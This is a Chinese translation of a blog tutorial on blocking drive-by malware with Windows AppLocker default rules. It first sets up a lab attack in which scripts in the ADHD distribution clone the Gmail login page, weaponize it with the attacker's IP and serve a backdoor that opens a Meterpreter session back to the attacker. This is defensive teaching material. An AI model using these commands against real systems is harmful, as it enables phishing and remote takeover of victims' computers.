使用AppLocker入门指南

作者：John Strand

我经常接到客户的电话，他们不知道如何开始应用程序白名单的实施。一些组织试图在整个环境中对每个应用程序实施完整的应用程序白名单，虽然这个目标很有趣且看似不错，但实际上并不可行。

为什么呢？因为开销巨大。跟上所有变化并处理补丁几乎是一项全职工作。有些组织尝试购买产品来替他们完成这项工作，但这几乎从未成功过。

相反，我们应该问：有没有办法实现80%的目标？有没有办法实施某种级别的白名单来阻止95%以上的路过式攻击？

答案是肯定的。

在这篇博客中，我们将介绍如何使用Windows AppLocker基于目录实现白名单。

首先，让我们看看没有运行AppLocker时会发生什么。我们将设置一个简单的后门，并让它连接回ADHD系统。请注意，目标不是展示如何绕过EDR和端点产品，而是创建一个简单的后门并让它连接回来。

顺便说一下，我们将使用ADHD。你可以在这里找到它：https://www.activecountermeasures.com/free-tools/adhd

此外，我们将在默认的Windows 10系统上展示这一点，没有安装防病毒软件。本博客的目标是逐步介绍AppLocker，而不是绕过防病毒软件。

首先，我们需要一些恶意软件。幸运的是，我们有几个脚本可以大大简化这个过程。请确保你的Windows和Linux系统都在运行。

在你的Linux系统上，请运行以下命令：

1

$ifconfig

请记下你的以太网适配器的IP地址。

请注意，我的适配器名为ens33，IP地址为192.168.123.128。你的IP地址和适配器名称可能不同。

请记下你的ADHD Linux系统的IP地址。

现在，运行以下命令来启动一个简单的后门和后门监听器：

1
2
3
4
5

$ sudo su -
# cd /opt/java-web-attack/
# ./clone.sh https://gmail.com
# ./weaponize.py index.html 192.168.123.128 <<<--- 你的IP会不同！！！！
# ./serve.sh

现在，从你的Windows系统浏览到你的Linux系统，下载恶意软件并运行它！

当你回到你的ADHD Linux系统时，你应该看到一个Meterpreter会话。

现在，让我们阻止这种情况发生！

首先，让我们配置AppLocker。为此，我们需要以管理员账户访问Windows系统上的本地安全策略。

只需按下Windows键（键盘左下角，看起来像Windows徽标），然后键入“Local Security”。它应该会弹出如下菜单。请选择“Local Security Policy”。

接下来，我们需要配置AppLocker。为此，请转到“Security Settings” > “Application Control Policies”，然后选择“AppLocker”。

在右侧窗格中，你会看到所有策略都有0条规则强制执行。我们将添加默认规则。我们选择默认规则是因为这样不太可能使系统崩溃。

请选择上述每个规则组（可执行文件、Windows安装程序、脚本和打包应用），对于每个组，在显示“There are no items to show in this view”的区域右键单击，然后选择“Create Default Rules”。

这应该会为每个组生成一组规则。它应该看起来类似于下面的样子：

现在，我们需要启动应用程序身份服务。这是通过按下Windows键并键入“Services”来完成的。这将打开服务应用程序。请选择它，然后双击“Application Identity”。

当应用程序身份属性对话框打开时，请按下“Start”按钮。这将启动服务。

现在，我们需要在你的Windows系统上创建一个标准用户账户。我将其命名为“whitelist”。

接下来，以管理员身份注销，并以“whitelist”身份重新登录。

现在，让我们浏览到你的Linux系统，下载恶意软件并再次尝试运行它。

你应该会收到一个错误。

这个目标的目的是展示基于目录路径创建默认规则是多么容易。

这是100%有效的吗？不，甚至差得远。但它会阻止大量的路过式攻击并让大多数渗透测试人员感到沮丧吗？

绝对会。

顺便说一下，你是否正在寻找关于如何通过Active Directory中的组策略实施这一点的网络研讨会？

酷。看看这个：

想要提升你的技能并从John本人那里学到更多？你可以查看他的以下课程！

• SOC核心技能
• 主动防御和网络欺骗
• 使用BHIS和MITRE ATT&CK开始安全之旅
• 渗透测试入门

提供实时/虚拟和点播形式。